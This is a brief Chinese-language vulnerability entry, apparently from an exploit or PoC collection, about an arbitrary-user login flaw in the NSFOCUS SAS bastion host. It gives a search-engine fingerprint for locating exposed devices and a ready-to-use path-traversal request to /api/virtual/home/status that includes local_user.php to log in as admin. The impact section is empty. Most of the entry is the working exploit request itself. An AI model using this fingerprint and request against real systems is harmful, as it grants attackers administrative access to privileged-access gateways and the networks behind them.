# 绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
# 漏洞描述
绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录
# 漏洞影响
# 网络测绘
body="'/needUsbkey.php?username='"
# 漏洞复现
登陆页面
验证POC
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
1